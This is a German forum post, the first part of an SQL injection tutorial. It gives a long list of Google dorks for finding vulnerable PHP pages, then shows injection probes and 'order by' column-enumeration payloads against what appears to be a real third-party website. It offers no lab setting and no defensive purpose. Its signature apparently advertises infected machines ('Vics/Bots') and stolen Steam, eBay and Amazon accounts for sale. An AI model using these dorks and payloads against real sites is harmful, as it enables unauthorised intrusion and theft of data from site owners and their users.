SQL Injection Tutorial ~ By Staix~ Teil 1

    • SQL Injection Tutorial ~ By Staix~ Teil 1

      SQL Injection Tutorial ~ By Staix~ Teil 1
      1. Google~Dorkz
      2. Anfang
      3. Order+By
      4. Union+Select, Version, Database
      5. Tables
      6. Columns
      7. Daten
      8. Danke fürs Lesen


      1. Google~Dorkz
      - Hier einpaar Google-Dorks, womit ihr nach SQLi-Vuln´s suchen könnt.
      inurl: trainers.php?id=
      inurl: buy.php?category=
      inurl: article.php?ID=
      inurl: play_old.php?id=
      inurl: declaration_more.php?decl_id=
      inurl: pageid=
      inurl: games.php?id=
      inurl: page.php?file=
      inurl: newsDetail.php?id=
      inurl: gallery.php?id=
      inurl: article.php?id=
      inurl: show.php?id=
      inurl: staff_id=
      inurl: newsitem.php?num=
      inurl: readnews.php?id=
      inurl: top10.php?cat=
      inurl: historialeer.php?num=
      inurl: reagir.php?num=
      inurl: Stray-Questions-View.php?num=
      inurl: forum_bds.php?num=
      inurl: game.php?id=
      inurl: view_product.php?id=
      inurl: newsone.php?id=
      inurl: sw_comment.php?id=
      inurl: news.php?id=
      inurl: avd_start.php?avd=
      inurl: event.php?id=
      inurl: product-item.php?id=
      inurl: sql.php?id=
      inurl: news_view.php?id=
      inurl: select_biblio.php?id=
      inurl: humor.php?id=
      inurl: aboutbook.php?id=
      inurl: ogl_inet.php?ogl_id=
      inurl: fiche_spectacle.php?id=
      inurl: communique_detail.php?id=
      inurl: sem.php3?id=
      inurl: kategorie.php4?id=
      inurl: news.php?id=
      inurl: index.php?id=
      inurl: faq2.php?id=
      inurl: show_an.php?id=
      inurl: preview.php?id=
      inurl: loadpsb.php?id=
      inurl: opinions.php?id=
      inurl: spr.php?id=
      inurl: pages.php?id=
      inurl: announce.php?id=
      inurl: clanek.php4?id=
      inurl: participant.php?id=
      inurl: download.php?id=
      inurl: main.php?id=
      inurl: review.php?id=
      inurl: chappies.php?id=
      inurl: read.php?id=
      inurl: prod_detail.php?id=
      inurl: viewphoto.php?id=
      inurl: article.php?id=
      inurl: person.php?id=
      inurl: productinfo.php?id=
      inurl: showimg.php?id=
      inurl: view.php?id=
      inurl: website.php?id=
      inurl: hosting_info.php?id=
      inurl: gallery.php?id=
      inurl: rub.php?idr=
      inurl: view_faq.php?id=
      inurl: artikelinfo.php?id=
      inurl: detail.php?ID=
      inurl: index.php?=
      inurl: profile_view.php?id=
      inurl: category.php?id=
      inurl: publications.php?id=
      inurl: fellows.php?id=
      inurl: downloads_info.php?id=
      inurl: prod_info.php?id=
      inurl: shop.php?do=part&id=
      inurl: productinfo.php?id=
      inurl: collectionitem.php?id=
      inurl: band_info.php?id=
      inurl: product.php?id=
      inurl: releases.php?id=
      inurl: ray.php?id=
      inurl: produit.php?id=
      inurl: pop.php?id=
      inurl: shopping.php?id=
      inurl: productdetail.php?id=
      inurl: post.php?id=
      inurl: viewshowdetail.php?id=
      inurl: clubpage.php?id=
      inurl: memberInfo.php?id=
      inurl: section.php?id=
      inurl: theme.php?id=
      inurl: page.php?id=
      inurl: shredder-categories.php?id=
      inurl: tradeCategory.php?id=
      inurl: product_ranges_view.php?ID=
      inurl: shop_category.php?id=
      inurl: transcript.php?id=
      inurl: channel_id=
      inurl: item_id=
      inurl: newsid=
      inurl: trainers.php?id=
      inurl: news-full.php?id=
      inurl: news_display.php?getid=
      inurl: index2.php?option=
      inurl: readnews.php?id=
      inurl: top10.php?cat=
      inurl: newsone.php?id=
      inurl: event.php?id=
      inurl: product-item.php?id=
      inurl: sql.php?id=
      inurl: aboutbook.php?id=
      inurl: preview.php?id=
      inurl: loadpsb.php?id=
      inurl: pages.php?id=
      inurl: material.php?id=
      inurl: clanek.php4?id=
      inurl: announce.php?id=
      inurl: chappies.php?id=
      inurl: read.php?id=
      inurl: viewapp.php?id=
      inurl: viewphoto.php?id=
      inurl: rub.php?idr=
      inurl: galeri_info.php?l=
      inurl: review.php?id=
      inurl: iniziativa.php?in=
      inurl: curriculum.php?id=
      inurl: labels.php?id=
      inurl: story.php?id=
      inurl: look.php?ID=
      inurl: newsone.php?id=
      inurl: aboutbook.php?id=
      inurl: material.php?id=
      inurl: opinions.php?id=
      inurl: announce.php?id=
      inurl: rub.php?idr=
      inurl: galeri_info.php?l=
      inurl: tekst.php?idt=
      inurl: newscat.php?id=
      inurl: newsticker_info.php?idn=
      inurl: rubrika.php?idr=
      inurl: rubp.php?idr=
      inurl: offer.php?idf=
      inurl: art.php?idm=
      inurl: title.php?id=



      2. Anfang
      -Also zum Anfang suchen wir uns erstmal eine Seite aus wo wir meinen, dass diese SQLi-Vuln ist.

      Beispiel:

      Quellcode

      1. http://modules.t-o-m-e.net/script.php?id=24


      Nun setzetn wir zum Anfang erst einfach ein Hochkomma hinten an die URL dran:

      Quellcode

      1. http://modules.t-o-m-e.net/script.php?id=24'


      Wenn uns nun ein Fehler ausgegeben wird, dann haben wir eine Vuln gefunden.
      Auf dieser Beispiel-Seite macht sich der Error, durch folgenden Text bemerkbar:

      Quellcode

      1. "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"



      3.Order+By
      -Nun ermitteln wir mittels dem SQL-Command "Order+By" die Column-Anzahl:
      Diese Taktik funktioniert so:
      Wir fragen den Server ab, ob er eine bestimmte Anzahl an Column´s besitzt, wenn NICHT, dann wird uns die Seite wieder einen Error ausgeben(Dies heisst, dann sie Seite hat WENIGER column´s als von uns gefragt)
      Wenn die Seite KEINEN fehler ausgibt, bedeutet das, dass die Seite entweder diese Anzahl an Column´s besitzt oder mehr.

      Dazu hängen wir den Befehl "Order+By+Anzahl" hinten an die Vuln-Url ran.
      Anzahl steht hierbei für unsere ColumnAnzahl die Abgefragt werden soll...
      Testen wir es mal an einem Beispiel:

      Quellcode

      1. http://modules.t-o-m-e.net/script.php?id=24+order+by+10--

      AM ENDE WERDEN IMMER 2 MINUSE DRAN GEHÄNGT IN JEDEM SCHRITT DEN WIR NOCH MACHEN WERDEN!!!
      Hierbei wird gefragt, ob die Seite 10 Columns besitzt. -> Als Ergebnis erhalten wir einen Error, das heisst die Seite besitzt KEINE 10 Columns sondern weniger.

      Jetzt testen wir halt einbissen rum...

      Quellcode

      1. http://modules.t-o-m-e.net/script.php?id=24+order+by+8--

      Hier wird KEIN Fehler ausgegeben, das heisst, dass die Seite 8 Columns besitzt, wenn wir nun die Gegenprobe machen:

      Quellcode

      1. http://modules.t-o-m-e.net/script.php?id=24+order+by+9--

      Sehen wir, dass er uns einen Fehler ausgibt nun wissen wir: 9 Columns = NEIN 8 Columns = JA

      Auf zum Zweiten Teil ->

      Feedback PLS!!!
      [SIZE="4"]ICQ: 622571[/SIZE]

      Loads(Vics/Bots),PSC

      PSC,Steam,MSN,Yahoo,Ebay,Amazon,Youtube